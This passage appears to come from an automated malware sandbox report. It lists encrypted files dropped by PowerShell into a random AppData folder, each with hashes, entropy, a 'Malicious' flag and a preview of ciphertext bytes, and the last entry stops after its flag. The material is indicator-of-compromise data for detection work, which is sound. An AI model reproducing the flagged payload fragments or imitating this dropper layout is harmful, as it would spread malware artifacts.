                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\saVYAxOjykZ.HIQpmfEZFRqdtKvxU
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):182659
                                                                                                    Entropy (8bit):7.99914742657095
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:TsZbCBxh+1Bpptfl46GY6TviLdiTegLES2/qAJqg9UmV4uFCzSL:RBxhgf76tvIdiygQn/qAJqZmVHFBL
                                                                                                    MD5:6E55438A14CB0750D6272A8A34142FF9
                                                                                                    SHA1:0D2A01200923F6CEBA4130F9F88FE159DDC749CD
                                                                                                    SHA-256:BE91FE8739A57D7D99A5435378AD531AB444AC067A14C492D0CB04F28D101F0C
                                                                                                    SHA-512:F93DEB991898E019BFFC99D8D5F65FB4CD6E55BCC98465D6CEEAFEE7701D2C046E2AFF0547C9B3B4E42BCA2A38E5BBCCC650DED4EF9BF30D18C7AFC2A3E0D123
                                                                                                    Malicious:true
                                                                                                    Preview: .r...O..K..(:-Ku|.%....J...A..........^Wr......\.=|...T...Bnp.Uyb....3.-n..Y'.}S...D..........BwHGl.n.x..`.d........4.....3.Cl.....ev7.r...&^5.V.v\.B......C|....X...f..f.....7u..*...s..k....p.J...a...]........?.'.s@+(.6..D&z...\..H!......"....ny4a.86..tu...v.j.C..ei.@..r,....9.3n[..6&{c$.6...=..hf..\...xj......C<.......mms..?^s....;.b.....zC>..g.-...z.....+.u.}...+....0e.)..9_.1X.}X5H!......W..._.....I~f.\7.Q.f...x....$E..x..m!8...B.....[{.....c.Gj.{........}Q.....i..Y|CH..n...`..PBpf..f...i^..i....Qtu;..>.C;......../.H...O!....B.....5k...IV.wV!....\...\..O=lSH...d...i...g...R.".9.R....\..h$.%..C........./x.....Z......{.B..=......,\I....,....Wy..j...xzK...X.\<h......6v..}.....t@...../C.,.$.y...{h...].p......n.'.....x..JX.&...H.g...C.Q5f..z..R7*._......@....L.......6;B#...-.....SZ.......g>J....N'.(...z_.^}.jJ.d..-.D..o#.ThA~..].....C.X'...x......-,.1.4%.........Z...jTm..1{.IS^.(...LXxdx.].@7...B.,.9.It.c.X.`+|V2....!...AEB..]qJ.#.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\sewoxypvrFhRNzJ.RltNnbpGUKk
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):191311
                                                                                                    Entropy (8bit):7.999098265375566
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:U4d9O5KjCZ7d+9UhmcEUBDwYUkPV1KYLUDVbePPOGb2VtOPFUffu0XQldS51fsAH:USiKjC5bhmHUhw1quZePv2wGffuC5xsE
                                                                                                    MD5:FC7785865E060CC1B6AC0FE44B4D18FF
                                                                                                    SHA1:B6DFA690BACE3610A63E978B9907E7B2ACB7D7C4
                                                                                                    SHA-256:334CE2645EC850007528C989F5CB20BFDBFA1F2FDA1B59A296FF01E9CB980B99
                                                                                                    SHA-512:B0660A76F5341D077B0EBA39DEF41AF40ED747E3B0E56CAC88561FFF3B83CCE8A214FC94B51AEFD21897A3E07624CE6689604969F603B04CDA62E312894C0CCA
                                                                                                    Malicious:true
                                                                                                    Preview: ..4..}V'.dq..o.Af+.e2.l..b&..S....Mu.j..K.w...@$.1e.......8WE.9.X..".&.m...S.c."..u...);5.a..f..>.T.....i.0q...V..V@.K.R.H.b.I.|......f..i....r...p...;.8s..F ..\$.!F..W6..|%.z..dvkO.".....o#c."Ze.......*.......G...z:b.n.~d.Y.Y./.}...!....?M...!.LH8....J.f..,HZ.=..M..p..| 8..}.~ k..h..23Y>.h..j.E.M....).~.2..If.,EU,U@`<Y...].R.9~...O$>h<*..t..I.$....Da}..q2...sL.....1...6;.(...... ..".C1.6.tT9(.v;8/.*...%.....z..Rx....!.Z..s..?...&.....F_;..-.d.G.O.|....K=]..}F...\c"n.:R...-..P...).....<..|*..c..L%._|)..l.u..s..q.:pW$20P.}.q...w.).X..|......!]`.....+S7{.........}|..l,8..x....v.....w...1H[..~\..=Xr..fS..n.K...A.D........).9.e.H..]...1..&..^.5.....D....).R....f...b.......^V._..L.....h.I?...@`."5.W..r.5.XO)..a.N..?..8....%...d.zg..........S..BP.1.b..=b.....B..Tw.......'.n....n.q.5..CB.z..J..Z.R.6...(s.......-e.;...=.f...HZ......W...7.NP.5....<..o@.|.E.*.........[z.+.v.I.cI"..L<....}^..n<.:.F....W.D(..`.C...q.D.......x.9....Sk8...._..v..-.e...
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\syJNYEdIUnhaRD.kKpDTwMhruvlPFIVi
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):114586
                                                                                                    Entropy (8bit):7.99819478316456
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:eiRbkSxb/BGYJ8DBmoI6IRK3YuUp8VsCX6WVWEygLwPr0jyFon3JZ84UKyg8X7l8:BKSiYPB6lzUysCqWVWE1E65ZIg4l8
                                                                                                    MD5:0916412E42668E2BC4BA32587EEF173C
                                                                                                    SHA1:3076A478184AC3038CD9FE7ED9B4EDCB021FC774
                                                                                                    SHA-256:6415BBE86E3170F9A85B2FE2177B20AE6278042DE368D14499A4F693F81DF4AF
                                                                                                    SHA-512:180C155EC22FB2FC8C57D604EDE12CCFBF8E93127DAADD78E887AD6A298CDBBB9A67148AB22CA0F8B69595C450C16F8803D69D94FBF4CA444E83192E7A37A7F6
                                                                                                    Malicious:true
                                                                                                    Preview: ...*...$E.]...f<.nP.9g...d.]...M..Q.O...e_.dB.J<S]A%....L.Nk2.C0i.~........*yO..F..|...bL.j%......='...e....0.R......W.K.$5.u}....[..h..z.x.....|.`..9uW.@.{..NU..v.a..1....b..4Sot..;.......2.O". \#..=....aw,..G]4.8.`."]...?...ank..}6.8.H.Y..I.u.....$.)..a....C.6...IG'........N.J......T.......J....'S@....N..'.$..wQ./..[..%}0z.=.ZQ...@.[..%K.l.:.XF..R".......~w@..?......5...`C.".../@..+>./.....m.5.#9.....g.4..P|.]/..I....N,m..M........,...$..ZlN>=MQ".P..........6........M......h..H..}...LZ......'.O.a)_#...~E...0x..>].8.R.K..X.>.He..g.H......C.M...:YSN......V.V,..r=...{X.<.u....t.......:.......y.O..%e..~...w..g.E..:..s.y.....Q...O.`...g1..9..KP.34...J..Y._...%.!.Z.J...9k.i._3... :...m..SP2..I.S.rB.@....m....8.....VHM....V3.;{Wn....w7.....Sm.3.z.h.).?..@<..1t.!..-Co.c8L..].\...t.....6....=..LFA.7..7.H..,..Np...$Qc.8.N%}.........;...X?...5.^=...!.H._...*...d.!J.$.".<.#~...a.}......|A...\2.Q.yw.j....%.1[.j..BT_.T...Zp..-.K.M..c6.&...J.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\syzTcpOoFHUWRZukvCn.lbUsxFnEVHJj
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):107801
                                                                                                    Entropy (8bit):7.998100492140821
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:0PgwCt9678FaX/4WcyBCgAL3/pHUVk8UJ:0Pm9aIG/3cykJtHUa8a
                                                                                                    MD5:8B18B83C0C9389B6E69264A9AC37A280
                                                                                                    SHA1:D37EA1BD4892215CA2651C0FC6C938C2E4900688
                                                                                                    SHA-256:9340514AFED06D2B133FF9B0EF31FEC247BA58B1BDAA08CD66FC8FB12A04ED2E
                                                                                                    SHA-512:90F785036BFA0D574747BB0F0E1EB8F16D3750BE7020AF9611FCFF5DFE3BCA4183AD9F3BFCD0DF0C6B61AD655F2280AE0873A7BB05572D31A8980486CB36BD9E
                                                                                                    Malicious:true
                                                                                                    Preview: .W..@._l.]...}.A....L:."...x.D.3].%.~j....M.x..b).._V......sgwS.. ..wg5.*hh.;.w.N......?a.D..l.....G.kiS4..s9...d....R{7.{W....\..#N..<..#....[...LM.g`.ze...;..2.B.{.p.$./t............"BN...~a~B=.. I..g0W.L...#..#....Y{!.."....f....v.).+/.\...b[C.......D.C.w4..-.4.M.o.)....h..2../.......E~(E.......#(.H..i..<....&%...\...........0......_.uU..&~V....q^.0.AY.....=H...k...$...nu3*LqzG*...R..v..E.PUfn#...L.........../W.?M<...^.. .)_}.........T..2V6...m...........W?.&S..rQ.>..6....../?.".'....$...g....<........_.'H'...~q.\~@t....b..{....[T...OV..NW.X.E....h{.i....S...h..*..@....^..y..[.t.t..4.T.R.C.:c..0.o}......<O..9..?>....../.y...u+.....H.h...G...Q.H.cv.j.(slR.ke.$.._..Q.."..x'?.../qF...6f.....}..D$..H...*....o.(AB."l;...P..o^...............n...;............ABe.%.O...Y.........L8Y.:.....1.D.b.+.....^...8...8&E.-`.r1.......de....g..PD'....V.YN....g.A.....e...(*NV..d.-.".6.s.B.a.......gj>.8.1.,......^.... .p".,...B..{.O.F.%..G...
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\tAGKNjVqhTwEb.FakNjwdlpGcnJOb
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):55504
                                                                                                    Entropy (8bit):7.9971112380828915
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:768:mwEuxUcCcZaG3BMU3BJXEk2HsICHXXSSU/JQ5VI0nK4dDUgv9ublY+CSGUFQKgNT:JxNFFJXbvICHreJ+VI0nK4Zn1vUmPvln
                                                                                                    MD5:7CAF9FE27EEAC41141092AA5EFD72F6D
                                                                                                    SHA1:DBEA1A4949D2298FDE4A670F6870422F6E7C246C
                                                                                                    SHA-256:5B974303B41156E7EE133FC1456CA899769E4B060217002DFB3A91DB8CF40C98
                                                                                                    SHA-512:A48647DC6469D5BBA3B74B1D0A9C300BA1BBE86A88E72E1FAAB15EBBB30329747757CBA712E9684C676478FFE863BF71C5CF834CA8AEFF0466F5333F9149256C
                                                                                                    Malicious:true
                                                                                                    Preview: }.u..C)..@.0#.F.".y...3....g....U.)....K................X.....AG..q.....W3.].@f.."....$.@.iA@.U......0..S..r.[.t:..0\"...8...M..V]...a94{U|.'v....6.:..8...]m`4..o.e....(.EWVx..H.7.WnhlOv'....!...q?.P.x..G....%s..;....?...a.$zN.P.h.4Y.\ .n...Y..%...FB...w...eiXv...tu.|9/.......k..{S&...N.b8.U..o..].W.X...<......O...L..&...%*$6Q....)."F.........mg..N...1.>..f..d...(.Y.O.R..=.Q....w.......;&..~3.......0.G....Z..8.E.}..\..'Y../.....^..T.7.O.m.F ....vor..IE.0...&....p~......vH.."..vR.&|..ZP.O.dF[...z...b.L.6.w.x./.r..+e.aBd..7........M.......55.....N....yKi.....R....1..i....1...&..3`.j8.8.....f.)..w.8)m.HX...>.+..m..&..1...M..-.E....f...VP.....^.Q._..(..`M./~"O.......y..h......m..h..>..Q...q.l....J.7,....y.VSz..i.`.s.....H..$..g.e~.....~.<..G.a*.e..>.p[..k.T.X.b......_}...p0(.V=.I.&y.(S~5.:b.....A...L..W.@.mCC....h.......CK)R.2Xf.p..:e!m...N<..%|..i.A..}.z.3:..]+..-..k.......E,.(.../.LJ....`..q..~O|...J..pv.4.&.H....Z..x..%..(.b.....#..E.q
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\tOJaAuCTFKQfVXPsbR.VRFiGlLxXEPJYnAI
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64871
                                                                                                    Entropy (8bit):7.997014834426305
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:2et53VNohKwNpcKJ+gLrb+Gxi3I+RRbESbfSOIiKDXYp98aUh:55johZppZXb+GYYMRbzjSOIPYp98aUh
                                                                                                    MD5:1DC36B52760751225562FB207B3FFE52
                                                                                                    SHA1:5B6A4C7C84BE1004F90E4AF28049FF19DDE88AC9
                                                                                                    SHA-256:80026785A927B3FF57ED95921F6172760D0D68A32715723CD2E5C3AC4E25770D
                                                                                                    SHA-512:A1C397973CF127D27512A8F26D3E911D581DB59DD14FD65FD3D3A0E0F0C1FF6FF52BF1C80AA843DBFB2097FB5AAFDAA71690A93A8438E82F9E951B51C23E112D
                                                                                                    Malicious:true
                                                                                                    Preview: r..=y..e.H...N....y..d...O..h\u..3.m...P.....-N...'..:[....J.<.B.5.....;.Z....!.3.bM...E...Kq....k3.b...mN."..k}....n.A.h'..z,..C... .a.YaP"K...z...W;Y..x.#_.[)...9.......[....K..]..e..........8A....%..._.DE..L...X<h4....#......R..0....`X..|.........$....a....xmU..../..~.Q.!..z.....1.WZ....Sm...f'.|..........x.x.q.Y....8..-...BS.a...T..4..Z.....q..j.D..........V........=!b|.v.......5...<...&.hi...k.d..5x.P.&.U .....$..js.\.V[.f|2.Zr...d!.X..o.U(Z.;..eX.n7.",B|.l..v..1...>....$.2..Aq.*...iBA..=.....Ve3..'Gd.I^!...g..et.i....5O..&".\j.q........../. .j..n.8o...=8..2BY..b.n...`...zW..o..s.........{..5."@. L....Q.G^.t.....f..5@....A.X.c/...'.mI....w.|jg..k-V.v..LpR?.....y.p..64g...<.u.f....8... ...m....1..."xV.N`..a.T......)....d.....o5..vZ._ou&M.g..3.).o.R..!.@tu.n.=Ndm(a...8.....;[..K....he./..[.....s....9.d..-.T9.S."]kP.....?...C-....kV.2r7)...=.RB...V".....Lqz_&....d..a.O../..s...5.3,...L..U....K..w"[!..........P.._...>.!..-.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\tUfqeDLJwTcys.PElvMqFBka
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):187977
                                                                                                    Entropy (8bit):7.998943947399903
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:G5jGoKGe9t+8BG6zmF34Ta0sJTROpNehnVnDm2k3xQfQEQ6NXd6aH4/:Q4BG6BTa0A19a2kmfQEN0aq
                                                                                                    MD5:6A7774B8A3228C23B0D9D470DC219B71
                                                                                                    SHA1:94352AC4678A3AC8C5ECBC2E7F8C4BBB96F6D463
                                                                                                    SHA-256:A127C315DDCE1FBAEE07703042285BBCE4E61354C9F10B743EDB38466143D8A2
                                                                                                    SHA-512:947966BCBFEAC07EAE0DEBBFB34736B1B5AFCAD9B6B10ACC34FFFB11434493D7249ADF66293E4A5A8B0597BCBFCB9E2A6704117A1D7E6CBC9AD6A8533578932E
                                                                                                    Malicious:true
                                                                                                    Preview: ..F.?..z.^...7..#.-O.pDa...%.h..8.iG...(...........w.3.....b.5xL#Or.@'...@.+G...`5.}.B.C.6a.7..L6.M....O.rc.;.{.x..1......i......<.]8.XtSi.v..o.C. ...AzP*|W.p.~...b....-.........&Y.v.....U.X.'...._.a.2.1%.^.....v.;...4...Oy.I;erC..D....=$.M.#. `c..]7S{A:..p.38M.w.;E)..J..S_,......b..|.cMp...I,.y%.....C........Eg...|.`.y.k>...R..qOvgD........P..T<........Q .....c..(@..O.sn3iy..e.2e.+!.v.Wk.e..w...,..L...@.?U....I.m.L..y...sh..9.t...I7..e#...1.u.3>.....)M...g........2.~.u..3\!.X.5........{..........`9!...k.B.o..R{...V.....@t.|.).d_..x.p.9.$=.S..7...5]"?&..+Mh.{u...,.k....h...9.....t..=..kBE......e......j...~nS......)........L....9...[r..b..<..(..}......h.ml...oR...[.v[.I.....?...VvR.fRv......oK.:.k..IR...H.....1)...R..F...8..Mi..O-.A.p-N)..<.ER.c>1.;g.[0..............u`.I..G.P.8&[.*..7...0..bRl...gN...f...?.Z...7.EZ.......W...!+.....3,..{.I.2...G...1..%*.[...9X...[.'.7...v9..JAk,..r.b.:T...U.&yK....u'.\.I;.....,./..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\tZWfRzoarqT.MsBODnGxVfFZjQiN
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):173654
                                                                                                    Entropy (8bit):7.998939021069137
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:gMbor0y/TIz4ri5FBrCPDwzewDmWwYVr2qJ8K6pvFkeJreYA0qYqeCvI:g1r7K/5zmP8yS7V58dpdRJiYAE
                                                                                                    MD5:A85599A72917D51CA912008448C939DD
                                                                                                    SHA1:96DAD0A6959BA820C80436B34E6A799C6E771F60
                                                                                                    SHA-256:F7A6F7EBFDBF0C5C437C1485E735FCF668F9329B5736533D0E7242445E11B86F
                                                                                                    SHA-512:FAF5F4E7F8A3289FD4B9CF15483511D88878CD1974D9E9A06CD05192E14895BD26B7D12593541ACB7234F0BD8CB5C262C8A7E8C66BFAF4DE039D3BFC6C9BCB64
                                                                                                    Malicious:true
                                                                                                    Preview: .PN..N!>.v....qn...M.7...W#.R.R..MNZ....1<...&.!U....N.d..*d.J$B..".}.....TN.H.(1c9.......C.4(..X.Fxr.....#Hk..8-<........{.k...;.....%.9....#.q.z.n.-..'...[*.O_)/..6...[....o>....U ..E..80.E.&......r.|!..o.R_....".;[.\+.o.qk|}....z|..hK.g.........x..~x...d.19hx........G.M...V.b~:R...K.-.tW.H4c..?..h.{.+....|Ht..>a...9.z.{......k...W.P..\.e.,..^...ld...h.0.>bA...uV..D..[v}o...K.........T...h.Omv..v..W.2.......)..{}D.[$^~a...V*e.. .N...-...-.>wx..D...\.I>...mA1D..>(-......3 .x.8l}p..m..g...lj.B48P.!..........5..x.S'o*...CxI.?.sJ.].....JvZ.....h...\.@lh}.>zQ?...v{..t8%......3,....a.4Xa#...t"...5.X.d..=G.....y...#..........}....~.r..#.h....h..8...A.uPr..N.......x.3..:.n..N$.D...h.."............6..s....S.e.........VJ4VQ!...@y...NOm..S.[FZ5...,.v.j.mC!..I..*.h.I........!....|.w...c.)..eB.3/_Z....n.o.!..=:G....k..g.IeDc..4......l..{N.?.'.P4|....+...F@..._]K+'.Y!P.j._.L==..-..iX..!.%.ee.....ZR.^O...P...{.?...@.8-*. ....@].......=.I....i6.)..-
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\tidEUqDQMmRJuN.pHvkDFUXKnb
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):62318
                                                                                                    Entropy (8bit):7.996877727490378
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:YOs2EXtT13H49Ssb0lnthLuhgXCPnjLJvi+vYkZQ3ve:Y72EXtTQb0ln7LuN/jFi+jZQ/e
                                                                                                    MD5:52C88DA00EEF873772DC1E68C79BCCAF
                                                                                                    SHA1:0A38A5DADDCDAF29012C274F487BAFB75D56B490
                                                                                                    SHA-256:42D1DACADDBC55F422C9537BF51DBCBE59753A098A1940D2994615ED840F6194
                                                                                                    SHA-512:DA3A285817FD5214762DF7092AF2D72DC7BBEA8317323CC1E110D5C55FF2AC4BF43264C0746ADD662BA9BCC7BA9D3FCE0A9F24EA90275AED9FFE5DA1C729D719
                                                                                                    Malicious:true
                                                                                                    Preview: W..b..V....M-.)?F.A..Td'...5..y.......r....9..........Q....j..;q.D7.ZU..UR... ....g.S....";&>....D.G/.S..............FAo..../.L4..f..8..WX......eY..>..bl..-.......%..<......M..>.Yb.e3sci....t.p.v3 5.......#...(H.iB>..1].d(......T.f..H.6.@....I..-..A../l.9}..X.T.@...v.|.I.C......hFv/..U.<T.90.3...2...s....a&.WF.J....gt....]....L..t......"......'......L.hJZf.MG..:...s..@k2t..............q.4.Z3..#..j..$...uS+.2.B..ARk.........M../...S.....B..h.^YBh=...l..T..M.......z.lo...[.gst1}.`.8-h....._;..e..........V..9",.`wz...W.7r.K....R....I}...,.&....c<..v [|0v...._:.-Q-.l:Z...KfgO.4..A.....L/+..Y...J..5?`]..^.0..U.QD.a}n.`.=...h.....J.A%.#=_...y...~.3..#N.J...D....:=?.....:..` ..Px6*... .i..=.,...woA.$^.`.../...<.0l_\...M.......+h.j..T..R.............Z.$?~.<o..-.-Ifu..E. #......`.3..N....W...z.......I.9..........g_...X.=h';.".-^.c...S<....*.Tb...WE..Y...i....}'......#..K..l...#6t...V.Br......E(..C".!m.=l....t.i~r.)..P.....I..)0...=...
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\tsiGmraAFXzD.QzLRespFnHrcXUt
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):63355
                                                                                                    Entropy (8bit):7.996998633373523
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:vXl4NWo6lQ7cFVrOCO+cYQejbDNOZz0P+kMEuthaNtroSrg4u:v14N52WMVTie3x4zFvEuthaPro7
                                                                                                    MD5:06EF73024E9A0FF3B4F15E2181EBD820
                                                                                                    SHA1:DA523EC82376F634ABB6816A608D19BA2BF858E5
                                                                                                    SHA-256:2B9310D56A1F6EF3B966F3D5892A7CBD895B168403185AC96247B5130A5461D6
                                                                                                    SHA-512:B8FDA64467E44B645C0534566B563BB51951110437943AFFDA7F9D12B2B0EBBC4EBBFE4A212578D8971DF42042F06F06F9C6D5B9E8E6E03BF3181CBA43183FCA
                                                                                                    Malicious:true
                                                                                                    Preview: S&.f..h......6MS...;.s).l..Jo1...~*...*Jl...u..}.H,lK..K..t5.>..M........N.&.X.J.0....]........'....)B[........B;.T...,.{i.[.`....</. ...R!..1..k..Aw|.S.h..K..9........M.P.....&I.OL.g`..'.L._.......\./.To9.=.V...L...r..zF...x....3R..f5.'\.....o.Z'5.b!NZ.'...65.K.....,S"JVvd.>.../..9.0.X6>f.g&b.d.dl(.......S.8...U...YdAl..../.H1W2..x....f.a.T.5^...R....J...4.."..-z.p...........E.9&..-........(......j..u5....hCX..`....(.+...~j[.+.6.la.<.?HK~jH{.0..9..........Q.1,.U2.76V..P.IjN].Mg}..d.r.7^.3.=L>x%.<.......5P....Y...m.u...Y..,.7............Dt....4q.U...Q'Y..zH.L.c.........@K..r..>UF,...p..l.u.....(..l..(..d..lE.X..Y..P3.e..9z..y]..pX.:...c..O.n.e6u[.L..J.Qc09.j .+....o'Lx.6U..C..........2.t..m.q..>gr..>......Q.gJ.ZC.......5Q..>*+1F.d.Bs.W...Ebn}yx5...A........E.........Rxh..a...%..AK..p%vj.P..D.B.....^.n.U.iB...<....u.e9'..YR.."....*c...'*a..n....|.^F....J+.i/Q....RY..>....Q.$(e.n.J....U..^..7.)vb....P.<.Em....b.\.a..9[.B..*O.(:.........
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\uAgJRrVTxiskym.yEHDLwPJXlWfRjTkUZh
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):53190
                                                                                                    Entropy (8bit):7.996498544082741
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:G5y4Gs9vKGe3NQE9ATOBx1uUlr8YhfM6xHJKSWxBwZwff:G5jGoKGe9t+8BG6zmFX
                                                                                                    MD5:F271D74BDFEE31307524AF92F1F82975
                                                                                                    SHA1:DCB9ADB6763DC4533A048290DB76CAD319463314
                                                                                                    SHA-256:72E6C56937EC2EE3CBCA5C61DF27339F202550E8D57D794D3779DD6A9722C61A
                                                                                                    SHA-512:46733C6A3C5156B9D6FC6E25B30163590C7E61F5330AAB9E8234195A7349D842661AB6EEE4AE69A7F19AAB732070F846F038ED14F3DA3F91A08B699CF930C34F
                                                                                                    Malicious:true
                                                                                                    Preview: ..F.?..z.^...7..#.-O.pDa...%.h..8.iG...(...........w.3.....b.5xL#Or.@'...@.+G...`5.}.B.C.6a.7..L6.M....O.rc.;.{.x..1......i......<.]8.XtSi.v..o.C. ...AzP*|W.p.~...b....-.........&Y.v.....U.X.'...._.a.2.1%.^.....v.;...4...Oy.I;erC..D....=$.M.#. `c..]7S{A:..p.38M.w.;E)..J..S_,......b..|.cMp...I,.y%.....C........Eg...|.`.y.k>...R..qOvgD........P..T<........Q .....c..(@..O.sn3iy..e.2e.+!.v.Wk.e..w...,..L...@.?U....I.m.L..y...sh..9.t...I7..e#...1.u.3>.....)M...g........2.~.u..3\!.X.5........{..........`9!...k.B.o..R{...V.....@t.|.).d_..x.p.9.$=.S..7...5]"?&..+Mh.{u...,.k....h...9.....t..=..kBE......e......j...~nS......)........L....9...[r..b..<..(..}......h.ml...oR...[.v[.I.....?...VvR.fRv......oK.:.k..IR...H.....1)...R..F...8..Mi..O-.A.p-N)..<.ER.c>1.;g.[0..............u`.I..G.P.8&[.*..7...0..bRl...gN...f...?.Z...7.EZ.......W...!+.....3,..{.I.2...G...1..%*.[...9X...[.'.7...v9..JAk,..r.b.:T...U.&yK....u'.\.I;.....,./..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\uPsdWGIbQqVpezZJm.uTXiLqmghdeYBKlk
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):61499
                                                                                                    Entropy (8bit):7.997306198780987
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:/imXo3awBOYG5i/PKXmeWQgxf3cAF13BJYlhK:/dY3aYG5iHKRWQgxfsAF13n9
                                                                                                    MD5:6D1D8D4915950B6AAAF8D8A569DCA019
                                                                                                    SHA1:A2A0AA38625578C97F41BAF03703E9A42A7673FD
                                                                                                    SHA-256:B59EECC1D5A8A8A169BF4E9195FE6D5A89284DF53CE8BEDFE166EF2A4A6C3EF3
                                                                                                    SHA-512:C857635FEAFDE727EB9EB05E046C7C4929A1C11CEC70CC68E2B118A8F6D74D09D1E91F9D6A097175E3C517E2A00310A171C023AC01E15E18D028AA6B6D34527F
                                                                                                    Malicious:true
                                                                                                    Preview: ..H. ...w.8..f.......g....F...j9..Q.k. ;..%....y.X....{n.{O.._...E...cn...C.... a......r..5%?R'.N.Q.&.).O7..k..D.sL.f.. .V.Y......g)...H..FO.m..8..4.....F+....jJN.T..;`.........L1.2.J.5.W....8A...T..`.....4x..E.7....T........}%.Dw..^.RXk.#@..oS.....t...->.....R...;....m.}.B.z.|$L.......0p_bqDl.3.......!../.>.]y.F.....[ ..Q.A9-T...ddZ.....0....S7....II.....G..j.q.Y.....P".;....(...v;..*..p..*..C.1....b7..'*e.Bm...."...E$.M{(..A.@..~........Sf}8.......M=}.^eGP#+..[.In.tH:Te....Ot...l1..U7@n.Q...J...._....`u...t.W**.--..4.Q..W..}x.......o\...m9/a7..R.V.-l..7.hGb...[.x.....$#tm... ]a+...r.\.l.._..{.p...G.a.....PG...$.....UP.w....Ba.....1.yr.....^.+V.Q.....DA.....+D....V. .V40.e.]F....GkH.8......UFq.+...gx3.p/.e.=v}...P.S;W`&j.L...1.}..V....... ...!(..;A....'.3&......;-..w.5....@]...1.....5..]..t.D....K('k.,...i#Y..{...=.V.^qk....&l*.Z..........9p..t..$...0.....".......q.{.U..P.7.k.L..G..e.@..Z...@..L...S./.........w.[.1+.q..-i...~WI%.9.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\uUOgyWFwaveMtzbmGT.wtuJAXyjilxDLUfbY
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):177895
                                                                                                    Entropy (8bit):7.998915951165725
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:4bjx3I4H2Ub4tRMj/rVBWGCW3+sZ4eBmvqWUGURXosXEzVbQM4Hy0cfAXx:ex39p4tm/rVBWwPZ4BlsQb3dAB
                                                                                                    MD5:2A6ED5E2DCFF6C70227AF8AB84A6425F
                                                                                                    SHA1:B727DD1483C9BA91450BE08FD3CF605940C5C3ED
                                                                                                    SHA-256:4A41C69CCF3F83BE005693A223A4379584436776D520DE099DACF8DC84A3E518
                                                                                                    SHA-512:D6241A60B7FD107C398743C49CB6644BA3F40E2EA20B244CCB5CDF99626E3FACBAF0A2C90BAC196E2B4D3F89A3B84B2867332D7C9BBDB249993FD0AD1DF851A8
                                                                                                    Malicious:true
